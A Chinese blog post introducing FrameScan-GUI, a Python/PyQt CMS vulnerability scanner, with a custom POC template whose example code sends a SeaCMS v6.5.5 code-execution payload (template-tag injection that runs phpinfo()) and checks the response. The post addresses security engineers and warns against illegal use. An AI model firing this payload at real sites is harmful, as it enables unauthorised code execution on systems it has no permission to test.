FrameScan-GUI CMS漏洞扫描

最新推荐文章于 2024-08-10 08:28:26 发布
最新推荐文章于 2024-08-10 08:28:26 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: 渗透工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/107005338
版权

工具简介

FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版。支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。

Github地址:https://github.com/qianxiao996/FrameScan-GUI

下载地址:https://github.com/qianxiao996/FrameScan-GUI/releases

支持平台

- Windows

使用方法

下载本项目,运行exe即可。

自定义POC模板

以下为POC模板,请尽量规范编写。脚本中为示例代码。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 漏洞名称(禁止换行)控制在30字以内
referer: 漏洞地址(禁止换行)未知请填unknown
author: 作者名
description: 漏洞描述 
'''
import sys
import requests
import warnings
def run(url):
    #此处编辑检测代码
    #示例代码,请更改result内容,result[0]为漏洞名称,result[1]为返回的内容,result[2]为测试结果
    result = ['seacms v6.5.5代码执行漏洞','','']
    headers = {
        "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*"
    url_path = url + "/search.php?phpinfo();"
    try:
        data = requests.get(url_path, timeout=3,headers=headers, verify=False)
        if data.status_code == 200 and 'phpinfo' in data.text:
            result[2]= "存在"
            result[1] = "URL:%s\nPOST:%s"%(url_path,payload)
        else:
            result[2] = "不存在"
    except Exception as e:
        # print (e)
        result[2] ="不存在"
        #这里可设置未知,连接超时等,只有不存在不会显示到结果中。
    return result
    #最后一定要返回一个带有3个参数的列表。不然会出错误。

if __name__ == "__main__":
    #此处不会调用
    warnings.filterwarnings("ignore")
    testVuln = run("http://baidu.com")
    print(testVuln)

鸣谢

POC多数来源于[AngelSword]部分为自己编写,欢迎投递POC

邮箱地址:qianxiao996@126.com

警告!

请勿用于非法用途!否则自行承担一切后果

浅笑⁹⁹⁶
关注
专栏目录
【Java基础知识 44】jd-gui反编译class文件,解决jd-gui中文乱码问题
学Java,找哪吒
07-19 2850
本书专门为想要入行从事产品经理相关工作的零基础就业人员而编写,涵盖了在产品准备阶段、产品开发阶段、产品测试阶段和产品上线后产品经理所需要具备的各项基本技能。全书共分为9章,第1章大致认识产品经理的职能范围;第2章讲解了产品经理的工作职责;第3章讲解了需求的相关知识;第4章介绍了流程的相关知识;第5章展示了结构图;第6章详细阐述了界面原型的相关知识;第7章介绍了UML图;第8章介绍了PRD文档的相关知识;第9章介绍了软件测试的相关知识。
web安全工具库(笔记)----端口扫描(masscan-GUI V0.72)
边城浪子的博客
03-06 2378
最简单的方法介绍工具。 系统:windows 10 masscan-GUI V0.72工具使用方法: 1.打开软件后,输入“网址”,或ip地址后,点击“>>ping ”-----点击“端口扫描” 端口模式有3种分别为: ----------------------------------------------------------------------------- ...
CMS扫描脚本
08-29
CMS扫描脚本,通过json字典内的数据扫描网站的cms,json文件很全,识别率很高。
FrameScan CMS漏洞扫描
浅笑996的博客
06-28 750
工具简介 GithubL:https://github.com/qianxiao996/FrameScan FrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。 支持平台 Windows Linux MAC(请自测) 工具特点 单URL批量检测 单URL单漏洞检测 单URL指定CMS检测 多
CMSmap 使用教程与简介
最新发布
gitblog_00686的博客
08-10 276
CMSmap 使用教程与简介 CMSmapCMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. 项目地址:https://gitcode.com/gh_mirrors/cm/CMSmap 1. 项目介绍 ...
CMS漏洞检测工具 – CMSmap
weixin_34248487的博客
01-05 1486
CMSmap是一个Python编写的针对开源CMS(内容管理系统)的安全扫描器,它可以自动检测当前国外最流行的CMS的安全漏洞。CMSmap主要是在一个单一的工具集合了不同类型的CMS的常见的漏洞。CMSmap目前只支持WordPress,Joomla和Drupal。 主要功能 1.其可以检测目标网站的cms基本类型,CMSmap默认自带一个WordPress,Joomla和Drup...
python gui测试框架_GitHub - rebootORZ/FrameScan-GUI: FrameScan-GUI 一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架。...
weixin_39746241的博客
12-16 386
FrameScan-GUI工具简介FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan 的加强版。支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。支持平台Windows使用方法下载本项目,运行exe即可。插件模板以下为POC模板,请尽量规范编写。脚本中...
探索 FrameScan-GUI:一款强大的图像帧扫描工具
gitblog_00038的博客
04-18 402
探索 FrameScan-GUI:一款强大的图像帧扫描工具 项目地址:https://gitcode.com/qianxiao996/FrameScan-GUI 项目简介 FrameScan-GUI 是一个易于使用的图形用户界面(GUI)应用,专注于视频帧级别的扫描和处理。这个项目由 qianxiao996 创建,旨在帮助开发者、数据标注员或者任何需要对视频逐帧操作的人,提高工作效率,简化工作流程...
jd-gui-windows-1.2.0.zip
06-26
1. 下载与解压:首先从官方网站或者其他可信源下载jd-gui-windows-1.2.0.zip,解压缩后得到JD-GUI的执行文件。 2. 运行JD-GUI:双击jd-gui.exe启动程序,无需安装过程。 3. 查看源码:将待分析的.class文件拖放到JD-...
X-SCAN 漏洞扫描
01-24
**X-SCAN 漏洞扫描工具详解** X-SCAN,全称为“X-Scanner”,是由国内知名安全团队“安全焦点”开发的一款高效且全面的安全漏洞扫描器。它以其强大的功能和用户友好的界面,成为了许多系统管理员和安全专业人员的...
Java反编译神器jd-gui最新1.4版本
11-05
最新版jd-gui,适用于x86版本的JDK,JDK最低要求1.6,最高支持1.8
scan-framework:用于漏洞扫描的框架
06-10
scan-framework scan-framework是一个漏洞批量利用扫描框架,只需要进行简单配置,就可以变成一个任意漏洞批量利用的工具,前提是你必须有漏洞的payload、扫描的IP或者域名列表。 你可以使用 scan-framework: 进行GET方法的形式的漏洞批量扫描 进行POST方法的形式的漏洞批量扫描 进行Http原始报文的漏洞批量扫描 使用步骤 确保收集一个有效的漏洞探测payload 有一个待扫描的IP或者域名列表 触发漏洞的页面中有代表漏洞探测成功的特征字符串 会使用scan-framework的配置文件 入口文件为cli.py 命令行参数-m 配置文件 配置文件位于工程中的conf文件夹下: [main] # 扫描为真的规则(支持正则) scan_rule = hacker # 扫描后收集结果的规则(支持正则) res_rule = hacker # 扫描使用的
RDP漏洞[ CVE-2019-0708 ]无损扫描工具GUI.zip
09-11
永恒之蓝0708检测工具
趴站蹲点\M7lrvCMS 网站扫描程序V2.0.zip
07-15
M7lrvCMS 网站扫描程序V2.0
Python-CMSScan为CMS安全扫描提供集中的安全控制台
08-10
CMSScan为CMS安全扫描提供集中的安全控制台。 它由wpscan,droopescan,vbscan和joomscan提供支持。 它支持按需扫描和计划扫描,并且能够发送电子邮件报告。
CMS在线扫描器
欢迎来到神林的博客
09-11 3821
CMS在线扫描器 链接链接cms扫描,收集洞
自动化企业漏洞扫描器框架
Z_LiT0的博客
08-17 484
我觉得吧写的不是很好,前台界面不能看。 主要支持插件的添加,而且现在插件还在完善中。 第二点我觉得是我写这么久才写好真是又懒又菜,捞的就不谈了。 先上代码<—-click me ...
并发标记扫描(CMS)收集器(待完成)
weixin_34198583的博客
09-01 176
并发标记扫描(CMS)收集器专为需要较短垃圾收集暂停时间且能够在应用程序运行时与垃圾收集器共享处理器资源的应用程序而设计。 对于任何暂停时间要求较低的应用程序,应考虑使用此收集器。 使用命令行选项启用CMS收集器-XX:+UseConcMarkSweepGC。 与其他可用的收集器类似,CMS收集器是分代的;;因此,小型和主要收集都会发生 CMS收集器尝试通过使用单独的垃圾收集器线程...
探索技术创新:FrameScan - 实时视频帧检测框架
gitblog_00074的博客
04-06 329
探索技术创新:FrameScan - 实时视频帧检测框架 项目地址:https://gitcode.com/qianxiao996/FrameScan 本文将介绍一个名为FrameScan的开源项目,它是一个用于实时视频帧处理和对象检测的高效框架。我们将探讨其技术原理,应用领域,以及显著的特点,希望激发更多的开发者和爱好者尝试并利用此工具。 项目简介 FrameScan是一个基于Python编写的...
uc-GUI 4.04 图形用户界面手册详解
uc-GUI 4.04 手册 uc-GUI 4.04 手册是 Micrium Technologies Corporation 发布的一份详细的图形用户界面手册,旨在指导用户使用 uc-GUI 来开发图形化的单片机应用程序。下面是手册中所涉及的关键知识点: 1. uc-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值